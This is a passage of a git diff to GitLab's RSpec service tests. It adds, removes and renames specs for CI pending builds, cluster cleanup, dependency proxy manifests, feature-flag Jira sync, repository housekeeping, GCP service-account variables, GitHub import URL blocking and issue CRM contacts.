Ci::StuckBuilds::DropPendingService do it_behaves_like 'job is unchanged' end - - context 'when created_at is outside lookback window' do - let(:created_at) { described_class::BUILD_LOOKBACK - 1.day } - - it_behaves_like 'job is unchanged' - end end end end @@ -179,12 +155,6 @@ RSpec.describe Ci::StuckBuilds::DropPendingService do it_behaves_like 'job is unchanged' end - - context 'when created_at is outside lookback window' do - let(:created_at) { described_class::BUILD_LOOKBACK - 1.day } - - it_behaves_like 'job is 
unchanged' - end end end diff --git a/spec/services/ci/update_pending_build_service_spec.rb b/spec/services/ci/update_pending_build_service_spec.rb index d36564938c8..2bb0aded24a 100644 --- a/spec/services/ci/update_pending_build_service_spec.rb +++ b/spec/services/ci/update_pending_build_service_spec.rb @@ -43,9 +43,9 @@ RSpec.describe Ci::UpdatePendingBuildService do expect(pending_build_2.instance_runners_enabled).to be_truthy end - context 'when ci_pending_builds_maintain_shared_runners_data is disabled' do + context 'when ci_pending_builds_maintain_denormalized_data is disabled' do before do - stub_feature_flags(ci_pending_builds_maintain_shared_runners_data: false) + stub_feature_flags(ci_pending_builds_maintain_denormalized_data: false) end it 'does not update all pending builds', :aggregate_failures do @@ -67,9 +67,9 @@ RSpec.describe Ci::UpdatePendingBuildService do expect(pending_build_2.instance_runners_enabled).to be_truthy end - context 'when ci_pending_builds_maintain_shared_runners_data is disabled' do + context 'when ci_pending_builds_maintain_denormalized_data is disabled' do before do - stub_feature_flags(ci_pending_builds_maintain_shared_runners_data: false) + stub_feature_flags(ci_pending_builds_maintain_denormalized_data: false) end it 'does not update all pending builds', :aggregate_failures do diff --git a/spec/services/clusters/agent_tokens/create_service_spec.rb b/spec/services/clusters/agent_tokens/create_service_spec.rb index 92629af06c8..dc7abd1504b 100644 --- a/spec/services/clusters/agent_tokens/create_service_spec.rb +++ b/spec/services/clusters/agent_tokens/create_service_spec.rb @@ -47,6 +47,21 @@ RSpec.describe Clusters::AgentTokens::CreateService do expect(token.name).to eq(params[:name]) end + it 'creates an activity event' do + expect { subject }.to change { ::Clusters::Agents::ActivityEvent.count }.by(1) + + token = subject.payload[:token].reload + event = cluster_agent.activity_events.last + + expect(event).to have_attributes( 
+ kind: 'token_created', + level: 'info', + recorded_at: token.created_at, + user: token.created_by_user, + agent_token: token + ) + end + context 'when params are invalid' do let(:params) { { agent_id: 'bad_id' } } @@ -54,6 +69,10 @@ RSpec.describe Clusters::AgentTokens::CreateService do expect { subject }.not_to change(::Clusters::AgentToken, :count) end + it 'does not create an activity event' do + expect { subject }.not_to change { ::Clusters::Agents::ActivityEvent.count } + end + it 'returns validation errors', :aggregate_failures do expect(subject.status).to eq(:error) expect(subject.message).to eq(["Agent must exist", "Name can't be blank"]) diff --git a/spec/services/clusters/cleanup/project_namespace_service_spec.rb b/spec/services/clusters/cleanup/project_namespace_service_spec.rb index ec510b2e3c5..8d3ae217a9f 100644 --- a/spec/services/clusters/cleanup/project_namespace_service_spec.rb +++ b/spec/services/clusters/cleanup/project_namespace_service_spec.rb @@ -95,5 +95,31 @@ RSpec.describe Clusters::Cleanup::ProjectNamespaceService do subject end end + + context 'when there is a Kubeclient::HttpError' do + let(:kubeclient_instance_double) do + instance_double(Gitlab::Kubernetes::KubeClient) + end + + ['Unauthorized', 'forbidden', 'Certificate verify Failed'].each do |message| + it 'schedules ::ServiceAccountWorker with accepted errors' do + allow(kubeclient_instance_double) + .to receive(:delete_namespace) + .and_raise(Kubeclient::HttpError.new(401, message, nil)) + + expect(Clusters::Cleanup::ServiceAccountWorker).to receive(:perform_async).with(cluster.id) + + subject + end + end + + it 'raises error with unaccepted errors' do + allow(kubeclient_instance_double) + .to receive(:delete_namespace) + .and_raise(Kubeclient::HttpError.new(401, 'unexpected message', nil)) + + expect { subject }.to raise_error(Kubeclient::HttpError) + end + end end end diff --git a/spec/services/clusters/cleanup/service_account_service_spec.rb 
b/spec/services/clusters/cleanup/service_account_service_spec.rb index adcdbd84da0..769762237f9 100644 --- a/spec/services/clusters/cleanup/service_account_service_spec.rb +++ b/spec/services/clusters/cleanup/service_account_service_spec.rb @@ -52,5 +52,19 @@ RSpec.describe Clusters::Cleanup::ServiceAccountService do expect { subject }.to change { Clusters::Cluster.where(id: cluster.id).exists? }.from(true).to(false) end end + + context 'when there is a Kubeclient::HttpError' do + ['Unauthorized', 'forbidden', 'Certificate verify Failed'].each do |message| + before do + allow(kubeclient_instance_double) + .to receive(:delete_service_account) + .and_raise(Kubeclient::HttpError.new(401, message, nil)) + end + + it 'destroys cluster' do + expect { subject }.to change { Clusters::Cluster.where(id: cluster.id).exists? }.from(true).to(false) + end + end + end end end diff --git a/spec/services/clusters/integrations/prometheus_health_check_service_spec.rb b/spec/services/clusters/integrations/prometheus_health_check_service_spec.rb index 9db3b9d2417..7147f1b9b28 100644 --- a/spec/services/clusters/integrations/prometheus_health_check_service_spec.rb +++ b/spec/services/clusters/integrations/prometheus_health_check_service_spec.rb @@ -58,7 +58,7 @@ RSpec.describe Clusters::Integrations::PrometheusHealthCheckService, '#execute' let(:prometheus_enabled) { true } before do - client = instance_double('PrometheusClient', healthy?: client_healthy) + client = instance_double('Gitlab::PrometheusClient', healthy?: client_healthy) expect(prometheus).to receive(:prometheus_client).and_return(client) end diff --git a/spec/services/concerns/audit_event_save_type_spec.rb b/spec/services/concerns/audit_event_save_type_spec.rb new file mode 100644 index 00000000000..fbaebd9f85c --- /dev/null +++ b/spec/services/concerns/audit_event_save_type_spec.rb @@ -0,0 +1,28 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe AuditEventSaveType do + subject(:target) { 
Object.new.extend(described_class) } + + describe '#should_save_database? and #should_save_stream?' do + using RSpec::Parameterized::TableSyntax + + where(:query_method, :query_param, :result) do + :should_save_stream? | :stream | true + :should_save_stream? | :database_and_stream | true + :should_save_database? | :database | true + :should_save_database? | :database_and_stream | true + :should_save_stream? | :database | false + :should_save_stream? | nil | false + :should_save_database? | :stream | false + :should_save_database? | nil | false + end + + with_them do + it 'returns corresponding results according to the query_method and query_param' do + expect(target.send(query_method, query_param)).to eq result + end + end + end +end diff --git a/spec/services/dependency_proxy/find_or_create_manifest_service_spec.rb b/spec/services/dependency_proxy/find_cached_manifest_service_spec.rb index ef608c9b113..29bdf1f11c3 100644 --- a/spec/services/dependency_proxy/find_or_create_manifest_service_spec.rb +++ b/spec/services/dependency_proxy/find_cached_manifest_service_spec.rb @@ -1,7 +1,7 @@ # frozen_string_literal: true require 'spec_helper' -RSpec.describe DependencyProxy::FindOrCreateManifestService do +RSpec.describe DependencyProxy::FindCachedManifestService do include DependencyProxyHelpers let_it_be(:image) { 'alpine' } @@ -49,14 +49,6 @@ RSpec.describe DependencyProxy::FindOrCreateManifestService do end it_behaves_like 'returning no manifest' - - context 'with dependency_proxy_manifest_workhorse feature disabled' do - before do - stub_feature_flags(dependency_proxy_manifest_workhorse: false) - end - - it_behaves_like 'downloading the manifest' - end end context 'failed head request' do @@ -66,14 +58,6 @@ RSpec.describe DependencyProxy::FindOrCreateManifestService do end it_behaves_like 'returning no manifest' - - context 'with dependency_proxy_manifest_workhorse feature disabled' do - before do - stub_feature_flags(dependency_proxy_manifest_workhorse: false) - 
end - - it_behaves_like 'downloading the manifest' - end end end @@ -105,20 +89,6 @@ RSpec.describe DependencyProxy::FindOrCreateManifestService do end it_behaves_like 'returning no manifest' - - context 'with dependency_proxy_manifest_workhorse feature disabled' do - before do - stub_feature_flags(dependency_proxy_manifest_workhorse: false) - end - - it 'downloads the new manifest and updates the existing record', :aggregate_failures do - expect(subject[:status]).to eq(:success) - expect(subject[:manifest]).to eq(dependency_proxy_manifest) - expect(subject[:manifest].content_type).to eq(content_type) - expect(subject[:manifest].digest).to eq(digest) - expect(subject[:from_cache]).to eq false - end - end end context 'when the cached manifest is expired' do @@ -129,14 +99,6 @@ RSpec.describe DependencyProxy::FindOrCreateManifestService do end it_behaves_like 'returning no manifest' - - context 'with dependency_proxy_manifest_workhorse feature disabled' do - before do - stub_feature_flags(dependency_proxy_manifest_workhorse: false) - end - - it_behaves_like 'downloading the manifest' - end end context 'failed connection' do diff --git a/spec/services/dependency_proxy/pull_manifest_service_spec.rb b/spec/services/dependency_proxy/pull_manifest_service_spec.rb deleted file mode 100644 index 6018a3229fb..00000000000 --- a/spec/services/dependency_proxy/pull_manifest_service_spec.rb +++ /dev/null @@ -1,77 +0,0 @@ -# frozen_string_literal: true -require 'spec_helper' - -RSpec.describe DependencyProxy::PullManifestService do - include DependencyProxyHelpers - - let(:image) { 'alpine' } - let(:tag) { '3.9' } - let(:token) { Digest::SHA256.hexdigest('123') } - let(:manifest) { { foo: 'bar' }.to_json } - let(:digest) { '12345' } - let(:content_type) { 'foo' } - let(:headers) do - { DependencyProxy::Manifest::DIGEST_HEADER => digest, 'content-type' => content_type } - end - - subject { described_class.new(image, tag, token).execute_with_manifest(&method(:check_response)) } - - 
context 'remote request is successful' do - before do - stub_manifest_download(image, tag, headers: headers) - end - - it 'successfully returns the manifest' do - def check_response(response) - response[:file].rewind - - expect(response[:status]).to eq(:success) - expect(response[:file].read).to eq(manifest) - expect(response[:digest]).to eq(digest) - expect(response[:content_type]).to eq(content_type) - end - - subject - end - end - - context 'remote request is not found' do - before do - stub_manifest_download(image, tag, status: 404, body: 'Not found') - end - - it 'returns a 404 not found error' do - def check_response(response) - expect(response[:status]).to eq(:error) - expect(response[:http_status]).to eq(404) - expect(response[:message]).to eq('Not found') - end - - subject - end - end - - context 'net timeout exception' do - before do - manifest_link = DependencyProxy::Registry.manifest_url(image, tag) - - stub_full_request(manifest_link).to_timeout - end - - it 'returns a 599 error' do - def check_response(response) - expect(response[:status]).to eq(:error) - expect(response[:http_status]).to eq(599) - expect(response[:message]).to eq('execution expired') - end - - subject - end - end - - context 'no block is given' do - subject { described_class.new(image, tag, token).execute_with_manifest } - - it { expect { subject }.to raise_error(ArgumentError, 'Block must be provided') } - end -end diff --git a/spec/services/deployments/older_deployments_drop_service_spec.rb b/spec/services/deployments/older_deployments_drop_service_spec.rb index e6fd6725d7d..d9a512a5dd2 100644 --- a/spec/services/deployments/older_deployments_drop_service_spec.rb +++ b/spec/services/deployments/older_deployments_drop_service_spec.rb @@ -70,6 +70,8 @@ RSpec.describe Deployments::OlderDeploymentsDropService do let(:older_deployment) { create(:deployment, :created, environment: environment, deployable: build) } let(:build) { create(:ci_build, :manual) } + # Manual jobs should not be 
accounted as outdated deployment jobs. + # See https://gitlab.com/gitlab-org/gitlab/-/issues/255978 for more information. it 'does not drop any builds nor track the exception' do expect(Gitlab::ErrorTracking).not_to receive(:track_exception) diff --git a/spec/services/events/destroy_service_spec.rb b/spec/services/events/destroy_service_spec.rb new file mode 100644 index 00000000000..8dcbb83eb1d --- /dev/null +++ b/spec/services/events/destroy_service_spec.rb @@ -0,0 +1,50 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Events::DestroyService do + subject(:service) { described_class.new(project) } + + let_it_be(:project, reload: true) { create(:project, :repository) } + let_it_be(:another_project) { create(:project) } + let_it_be(:merge_request) { create(:merge_request, source_project: project) } + let_it_be(:user) { create(:user) } + + let!(:unrelated_event) { create(:event, :merged, project: another_project, target: another_project, author: user) } + + before do + create(:event, :created, project: project, target: project, author: user) + create(:event, :created, project: project, target: merge_request, author: user) + create(:event, :merged, project: project, target: merge_request, author: user) + end + + let(:events) { project.events } + + describe '#execute', :aggregate_failures do + it 'deletes the events' do + response = nil + + expect { response = subject.execute }.to change(Event, :count).by(-3) + + expect(response).to be_success + expect(unrelated_event.reload).to be_present + end + + context 'when an error is raised while deleting the records' do + before do + allow(project).to receive_message_chain(:events, :all, :delete_all).and_raise(ActiveRecord::ActiveRecordError) + end + + it 'returns error' do + response = subject.execute + + expect(response).to be_error + expect(response.message).to eq 'Failed to remove events.' 
+ end + + it 'does not delete events' do + expect { subject.execute }.not_to change(Event, :count) + end + end + end +end diff --git a/spec/services/feature_flags/create_service_spec.rb b/spec/services/feature_flags/create_service_spec.rb index 5a517ce6a64..e37d41562f9 100644 --- a/spec/services/feature_flags/create_service_spec.rb +++ b/spec/services/feature_flags/create_service_spec.rb @@ -62,10 +62,24 @@ RSpec.describe FeatureFlags::CreateService do expect { subject }.to change { Operations::FeatureFlag.count }.by(1) end - it 'syncs the feature flag to Jira' do - expect(::JiraConnect::SyncFeatureFlagsWorker).to receive(:perform_async).with(Integer, Integer) + context 'when Jira Connect subscription does not exist' do + it 'does not sync the feature flag to Jira' do + expect(::JiraConnect::SyncFeatureFlagsWorker).not_to receive(:perform_async) - subject + subject + end + end + + context 'when Jira Connect subscription exists' do + before do + create(:jira_connect_subscription, namespace: project.namespace) + end + + it 'syncs the feature flag to Jira' do + expect(::JiraConnect::SyncFeatureFlagsWorker).to receive(:perform_async).with(Integer, Integer) + + subject + end end it 'creates audit event' do diff --git a/spec/services/feature_flags/update_service_spec.rb b/spec/services/feature_flags/update_service_spec.rb index 4858139d60a..abe0112b27e 100644 --- a/spec/services/feature_flags/update_service_spec.rb +++ b/spec/services/feature_flags/update_service_spec.rb @@ -27,10 +27,24 @@ RSpec.describe FeatureFlags::UpdateService do expect(subject[:status]).to eq(:success) end - it 'syncs the feature flag to Jira' do - expect(::JiraConnect::SyncFeatureFlagsWorker).to receive(:perform_async).with(Integer, Integer) + context 'when Jira Connect subscription does not exist' do + it 'does not sync the feature flag to Jira' do + expect(::JiraConnect::SyncFeatureFlagsWorker).not_to receive(:perform_async) + + subject + end + end - subject + context 'when Jira Connect 
subscription exists' do + before do + create(:jira_connect_subscription, namespace: project.namespace) + end + + it 'syncs the feature flag to Jira' do + expect(::JiraConnect::SyncFeatureFlagsWorker).to receive(:perform_async).with(Integer, Integer) + + subject + end end it 'creates audit event with correct message' do diff --git a/spec/services/git/branch_push_service_spec.rb b/spec/services/git/branch_push_service_spec.rb index d70e458ba5e..5a637b0956b 100644 --- a/spec/services/git/branch_push_service_spec.rb +++ b/spec/services/git/branch_push_service_spec.rb @@ -554,44 +554,6 @@ RSpec.describe Git::BranchPushService, services: true do end end - describe "housekeeping", :clean_gitlab_redis_cache, :clean_gitlab_redis_queues, :clean_gitlab_redis_shared_state do - let(:housekeeping) { Repositories::HousekeepingService.new(project) } - - before do - allow(Repositories::HousekeepingService).to receive(:new).and_return(housekeeping) - end - - it 'does not perform housekeeping when not needed' do - expect(housekeeping).not_to receive(:execute) - - execute_service(project, user, oldrev: oldrev, newrev: newrev, ref: ref) - end - - context 'when housekeeping is needed' do - before do - allow(housekeeping).to receive(:needed?).and_return(true) - end - - it 'performs housekeeping' do - expect(housekeeping).to receive(:execute) - - execute_service(project, user, oldrev: oldrev, newrev: newrev, ref: ref) - end - - it 'does not raise an exception' do - allow(housekeeping).to receive(:try_obtain_lease).and_return(false) - - execute_service(project, user, oldrev: oldrev, newrev: newrev, ref: ref) - end - end - - it 'increments the push counter' do - expect(housekeeping).to receive(:increment!) 
- - execute_service(project, user, oldrev: oldrev, newrev: newrev, ref: ref) - end - end - describe "CI environments" do context 'create branch' do let(:oldrev) { blankrev } diff --git a/spec/services/git/process_ref_changes_service_spec.rb b/spec/services/git/process_ref_changes_service_spec.rb index 2a223091d0c..f52df9b0073 100644 --- a/spec/services/git/process_ref_changes_service_spec.rb +++ b/spec/services/git/process_ref_changes_service_spec.rb @@ -161,6 +161,50 @@ RSpec.describe Git::ProcessRefChangesService do end end end + + describe "housekeeping", :clean_gitlab_redis_cache, :clean_gitlab_redis_queues, :clean_gitlab_redis_shared_state do + let(:housekeeping) { Repositories::HousekeepingService.new(project) } + + before do + allow(Repositories::HousekeepingService).to receive(:new).and_return(housekeeping) + + allow(push_service_class) + .to receive(:new) + .with(project, project.owner, hash_including(execute_project_hooks: true, create_push_event: true)) + .exactly(changes.count).times + .and_return(service) + end + + it 'does not perform housekeeping when not needed' do + expect(housekeeping).not_to receive(:execute) + + subject.execute + end + + context 'when housekeeping is needed' do + before do + allow(housekeeping).to receive(:needed?).and_return(true) + end + + it 'performs housekeeping' do + expect(housekeeping).to receive(:execute) + + subject.execute + end + + it 'does not raise an exception' do + allow(housekeeping).to receive(:try_obtain_lease).and_return(false) + + subject.execute + end + end + + it 'increments the push counter' do + expect(housekeeping).to receive(:increment!) 
+ + subject.execute + end + end end context 'branch changes' do diff --git a/spec/services/google_cloud/service_accounts_service_spec.rb b/spec/services/google_cloud/service_accounts_service_spec.rb index a0d09affa72..505c623c02a 100644 --- a/spec/services/google_cloud/service_accounts_service_spec.rb +++ b/spec/services/google_cloud/service_accounts_service_spec.rb @@ -3,11 +3,11 @@ require 'spec_helper' RSpec.describe GoogleCloud::ServiceAccountsService do - let_it_be(:project) { create(:project) } - let(:service) { described_class.new(project) } describe 'find_for_project' do + let_it_be(:project) { create(:project) } + context 'when a project does not have GCP service account vars' do before do project.variables.build(key: 'blah', value: 'foo', environment_scope: 'world') @@ -21,13 +21,13 @@ RSpec.describe GoogleCloud::ServiceAccountsService do context 'when a project has GCP service account ci vars' do before do - project.variables.build(environment_scope: '*', key: 'GCP_PROJECT_ID', value: 'prj1') - project.variables.build(environment_scope: '*', key: 'GCP_SERVICE_ACCOUNT_KEY', value: 'mock') - project.variables.build(environment_scope: 'staging', key: 'GCP_PROJECT_ID', value: 'prj2') - project.variables.build(environment_scope: 'staging', key: 'GCP_SERVICE_ACCOUNT', value: 'mock') - project.variables.build(environment_scope: 'production', key: 'GCP_PROJECT_ID', value: 'prj3') - project.variables.build(environment_scope: 'production', key: 'GCP_SERVICE_ACCOUNT', value: 'mock') - project.variables.build(environment_scope: 'production', key: 'GCP_SERVICE_ACCOUNT_KEY', value: 'mock') + project.variables.build(protected: true, environment_scope: '*', key: 'GCP_PROJECT_ID', value: 'prj1') + project.variables.build(protected: true, environment_scope: '*', key: 'GCP_SERVICE_ACCOUNT_KEY', value: 'mock') + project.variables.build(protected: true, environment_scope: 'staging', key: 'GCP_PROJECT_ID', value: 'prj2') + project.variables.build(protected: true, 
environment_scope: 'staging', key: 'GCP_SERVICE_ACCOUNT', value: 'mock') + project.variables.build(protected: true, environment_scope: 'production', key: 'GCP_PROJECT_ID', value: 'prj3') + project.variables.build(protected: true, environment_scope: 'production', key: 'GCP_SERVICE_ACCOUNT', value: 'mock') + project.variables.build(protected: true, environment_scope: 'production', key: 'GCP_SERVICE_ACCOUNT_KEY', value: 'mock') project.save! end @@ -55,4 +55,55 @@ RSpec.describe GoogleCloud::ServiceAccountsService do end end end + + describe 'add_for_project' do + let_it_be(:project) { create(:project) } + + it 'saves GCP creds as project CI vars' do + service.add_for_project('env_1', 'gcp_prj_id_1', 'srv_acc_1', 'srv_acc_key_1') + service.add_for_project('env_2', 'gcp_prj_id_2', 'srv_acc_2', 'srv_acc_key_2') + + list = service.find_for_project + + aggregate_failures 'testing list of service accounts' do + expect(list.length).to eq(2) + + expect(list.first[:environment]).to eq('env_1') + expect(list.first[:gcp_project]).to eq('gcp_prj_id_1') + expect(list.first[:service_account_exists]).to eq(true) + expect(list.first[:service_account_key_exists]).to eq(true) + + expect(list.second[:environment]).to eq('env_2') + expect(list.second[:gcp_project]).to eq('gcp_prj_id_2') + expect(list.second[:service_account_exists]).to eq(true) + expect(list.second[:service_account_key_exists]).to eq(true) + end + end + + it 'replaces previously stored CI vars with new CI vars' do + service.add_for_project('env_1', 'new_project', 'srv_acc_1', 'srv_acc_key_1') + + list = service.find_for_project + + aggregate_failures 'testing list of service accounts' do + expect(list.length).to eq(2) + + # asserting that the first service account is replaced + expect(list.first[:environment]).to eq('env_1') + expect(list.first[:gcp_project]).to eq('new_project') + expect(list.first[:service_account_exists]).to eq(true) + expect(list.first[:service_account_key_exists]).to eq(true) + + 
expect(list.second[:environment]).to eq('env_2') + expect(list.second[:gcp_project]).to eq('gcp_prj_id_2') + expect(list.second[:service_account_exists]).to eq(true) + expect(list.second[:service_account_key_exists]).to eq(true) + end + end + + it 'underlying project CI vars must be protected' do + expect(project.variables.first.protected).to eq(true) + expect(project.variables.second.protected).to eq(true) + end + end end diff --git a/spec/services/groups/create_service_spec.rb b/spec/services/groups/create_service_spec.rb index 7ea08131419..81cab973b30 100644 --- a/spec/services/groups/create_service_spec.rb +++ b/spec/services/groups/create_service_spec.rb @@ -24,6 +24,16 @@ RSpec.describe Groups::CreateService, '#execute' do end end + context 'when `setup_for_company:true` is passed' do + let(:params) { group_params.merge(setup_for_company: true) } + let(:service) { described_class.new(user, params) } + let(:created_group) { service.execute } + + it 'creates group with the specified setup_for_company' do + expect(created_group.setup_for_company).to eq(true) + end + end + context 'creating a group with `default_branch_protection` attribute' do let(:params) { group_params.merge(default_branch_protection: Gitlab::Access::PROTECTION_NONE) } let(:service) { described_class.new(user, params) } diff --git a/spec/services/groups/transfer_service_spec.rb b/spec/services/groups/transfer_service_spec.rb index 35d46884f4d..3a696228382 100644 --- a/spec/services/groups/transfer_service_spec.rb +++ b/spec/services/groups/transfer_service_spec.rb @@ -792,7 +792,7 @@ RSpec.describe Groups::TransferService, :sidekiq_inline do end end - context 'when group has pending builds' do + context 'when group has pending builds', :sidekiq_inline do let_it_be(:project) { create(:project, :public, namespace: group.reload) } let_it_be(:other_project) { create(:project) } let_it_be(:pending_build) { create(:ci_pending_build, project: project) } diff --git 
a/spec/services/groups/update_shared_runners_service_spec.rb b/spec/services/groups/update_shared_runners_service_spec.rb index 53870e810b1..6e938984052 100644 --- a/spec/services/groups/update_shared_runners_service_spec.rb +++ b/spec/services/groups/update_shared_runners_service_spec.rb @@ -63,6 +63,8 @@ RSpec.describe Groups::UpdateSharedRunnersService do let_it_be(:pending_build_2) { create(:ci_pending_build, project: project, instance_runners_enabled: false) } it 'updates pending builds for the group' do + expect(::Ci::UpdatePendingBuildService).to receive(:new).and_call_original + subject expect(pending_build_1.reload.instance_runners_enabled).to be_truthy @@ -73,6 +75,8 @@ RSpec.describe Groups::UpdateSharedRunnersService do let(:params) { { shared_runners_setting: 'invalid_enabled' } } it 'does not update pending builds for the group' do + expect(::Ci::UpdatePendingBuildService).not_to receive(:new).and_call_original + subject expect(pending_build_1.reload.instance_runners_enabled).to be_falsey @@ -99,6 +103,8 @@ RSpec.describe Groups::UpdateSharedRunnersService do let_it_be(:pending_build_2) { create(:ci_pending_build, project: project, instance_runners_enabled: true) } it 'updates pending builds for the group' do + expect(::Ci::UpdatePendingBuildService).to receive(:new).and_call_original + subject expect(pending_build_1.reload.instance_runners_enabled).to be_falsey diff --git a/spec/services/import/github_service_spec.rb b/spec/services/import/github_service_spec.rb index 776df01d399..04a94d96f67 100644 --- a/spec/services/import/github_service_spec.rb +++ b/spec/services/import/github_service_spec.rb @@ -8,7 +8,7 @@ RSpec.describe Import::GithubService do let_it_be(:access_params) { { github_access_token: 'github-complex-token' } } let_it_be(:params) { { repo_id: 123, new_name: 'new_repo', target_namespace: 'root' } } - let(:subject) { described_class.new(client, user, params) } + subject(:github_importer) { described_class.new(client, user, params) } 
before do allow(subject).to receive(:authorized?).and_return(true) @@ -110,6 +110,29 @@ RSpec.describe Import::GithubService do end end end + + context 'when a blocked/local URL is used as github_hostname' do + let(:message) { 'Error while attempting to import from GitHub' } + let(:error) { "Invalid URL: #{url}" } + + before do + stub_application_setting(allow_local_requests_from_web_hooks_and_services: false) + end + + where(url: %w[https://localhost https://10.0.0.1]) + + with_them do + it 'returns and logs an error' do + allow(github_importer).to receive(:url).and_return(url) + + expect(Gitlab::Import::Logger).to receive(:error).with({ + message: message, + error: error + }).and_call_original + expect(github_importer.execute(access_params, :github)).to include(blocked_url_error(url)) + end + end + end end context 'when remove_legacy_github_client feature flag is enabled' do @@ -135,4 +158,12 @@ RSpec.describe Import::GithubService do message: '"repository" size (101 Bytes) is larger than the limit of 100 Bytes.' 
} end + + def blocked_url_error(url) + { + status: :error, + http_status: :bad_request, + message: "Invalid URL: #{url}" + } + end end diff --git a/spec/services/incident_management/issuable_escalation_statuses/create_service_spec.rb b/spec/services/incident_management/issuable_escalation_statuses/create_service_spec.rb new file mode 100644 index 00000000000..8fbab361ec4 --- /dev/null +++ b/spec/services/incident_management/issuable_escalation_statuses/create_service_spec.rb @@ -0,0 +1,30 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe IncidentManagement::IssuableEscalationStatuses::CreateService do + let_it_be(:project) { create(:project) } + + let(:incident) { create(:incident, project: project) } + let(:service) { described_class.new(incident) } + + subject(:execute) { service.execute} + + it 'creates an escalation status for the incident with no policy set' do + expect { execute }.to change { incident.reload.incident_management_issuable_escalation_status }.from(nil) + + status = incident.incident_management_issuable_escalation_status + + expect(status.policy_id).to eq(nil) + expect(status.escalations_started_at).to eq(nil) + expect(status.status_name).to eq(:triggered) + end + + context 'existing escalation status' do + let!(:existing_status) { create(:incident_management_issuable_escalation_status, issue: incident) } + + it 'exits without changing anything' do + expect { execute }.not_to change { incident.reload.incident_management_issuable_escalation_status } + end + end +end diff --git a/spec/services/admin/propagate_integration_service_spec.rb b/spec/services/integrations/propagate_service_spec.rb index b379286ba4f..7ae843f6aeb 100644 --- a/spec/services/admin/propagate_integration_service_spec.rb +++ b/spec/services/integrations/propagate_service_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe Admin::PropagateIntegrationService do +RSpec.describe Integrations::PropagateService do describe '.propagate' do include 
JiraServiceHelper diff --git a/spec/services/issues/create_service_spec.rb b/spec/services/issues/create_service_spec.rb index 18e03db11dc..8496bd31e00 100644 --- a/spec/services/issues/create_service_spec.rb +++ b/spec/services/issues/create_service_spec.rb @@ -5,7 +5,8 @@ require 'spec_helper' RSpec.describe Issues::CreateService do include AfterNextHelpers - let_it_be_with_reload(:project) { create(:project) } + let_it_be(:group) { create(:group) } + let_it_be_with_reload(:project) { create(:project, group: group) } let_it_be(:user) { create(:user) } let(:spam_params) { double } @@ -107,6 +108,13 @@ RSpec.describe Issues::CreateService do .to change { Label.where(incident_label_attributes).count }.by(1) end + it 'calls IncidentManagement::Incidents::CreateEscalationStatusService' do + expect_next(::IncidentManagement::IssuableEscalationStatuses::CreateService, a_kind_of(Issue)) + .to receive(:execute) + + issue + end + context 'when invalid' do before do opts.merge!(title: '') @@ -154,7 +162,7 @@ RSpec.describe Issues::CreateService do end it 'moves the issue to the end, in an asynchronous worker' do - expect(IssuePlacementWorker).to receive(:perform_async).with(be_nil, Integer) + expect(Issues::PlacementWorker).to receive(:perform_async).with(be_nil, Integer) described_class.new(project: project, current_user: user, params: opts, spam_params: spam_params).execute end @@ -430,25 +438,29 @@ RSpec.describe Issues::CreateService do end context 'Quick actions' do - context 'with assignee and milestone in params and command' do + context 'with assignee, milestone, and contact in params and command' do + let_it_be(:contact) { create(:contact, group: group) } + let(:opts) do { assignee_ids: [create(:user).id], milestone_id: 1, title: 'Title', - description: %(/assign @#{assignee.username}\n/milestone %"#{milestone.name}") + description: %(/assign @#{assignee.username}\n/milestone %"#{milestone.name}"), + add_contacts: [contact.email] } end before_all do - 
project.add_maintainer(user) + group.add_maintainer(user) project.add_maintainer(assignee) end - it 'assigns and sets milestone to issuable from command' do + it 'assigns, sets milestone, and sets contact to issuable from command' do expect(issue).to be_persisted expect(issue.assignees).to eq([assignee]) expect(issue.milestone).to eq(milestone) + expect(issue.issue_customer_relations_contacts.last.contact).to eq(contact) end end end diff --git a/spec/services/issues/set_crm_contacts_service_spec.rb b/spec/services/issues/set_crm_contacts_service_spec.rb index 65b22fe3b35..628f70efad6 100644 --- a/spec/services/issues/set_crm_contacts_service_spec.rb +++ b/spec/services/issues/set_crm_contacts_service_spec.rb @@ -22,13 +22,13 @@ RSpec.describe Issues::SetCrmContactsService do describe '#execute' do context 'when the user has no permission' do - let(:params) { { crm_contact_ids: [contacts[1].id, contacts[2].id] } } + let(:params) { { replace_ids: [contacts[1].id, contacts[2].id] } } it 'returns expected error response' do response = set_crm_contacts expect(response).to be_error - expect(response.message).to match_array(['You have insufficient permissions to set customer relations contacts for this issue']) + expect(response.message).to eq('You have insufficient permissions to set customer relations contacts for this issue') end end @@ -38,20 +38,20 @@ RSpec.describe Issues::SetCrmContactsService do end context 'when the contact does not exist' do - let(:params) { { crm_contact_ids: [non_existing_record_id] } } + let(:params) { { replace_ids: [non_existing_record_id] } } it 'returns expected error response' do response = set_crm_contacts expect(response).to be_error - expect(response.message).to match_array(["Issue customer relations contacts #{non_existing_record_id}: #{does_not_exist_or_no_permission}"]) + expect(response.message).to eq("Issue customer relations contacts #{non_existing_record_id}: #{does_not_exist_or_no_permission}") end end context 'when the 
contact belongs to a different group' do let(:group2) { create(:group) } let(:contact) { create(:contact, group: group2) } - let(:params) { { crm_contact_ids: [contact.id] } } + let(:params) { { replace_ids: [contact.id] } } before do group2.add_reporter(user) @@ -61,12 +61,12 @@ RSpec.describe Issues::SetCrmContactsService do response = set_crm_contacts expect(response).to be_error - expect(response.message).to match_array(["Issue customer relations contacts #{contact.id}: #{does_not_exist_or_no_permission}"]) + expect(response.message).to eq("Issue customer relations contacts #{contact.id}: #{does_not_exist_or_no_permission}") end end context 'replace' do - let(:params) { { crm_contact_ids: [contacts[1].id, contacts[2].id] } } + let(:params) { { replace_ids: [contacts[1].id, contacts[2].id] } } it 'updates the issue with correct contacts' do response = set_crm_contacts @@ -77,7 +77,18 @@ RSpec.describe Issues::SetCrmContactsService do end context 'add' do - let(:params) { { add_crm_contact_ids: [contacts[3].id] } } + let(:params) { { add_ids: [contacts[3].id] } } + + it 'updates the issue with correct contacts' do + response = set_crm_contacts + + expect(response).to be_success + expect(issue.customer_relations_contacts).to match_array([contacts[0], contacts[1], contacts[3]]) + end + end + + context 'add by email' do + let(:params) { { add_emails: [contacts[3].email] } } it 'updates the issue with correct contacts' do response = set_crm_contacts @@ -88,7 +99,18 @@ RSpec.describe Issues::SetCrmContactsService do 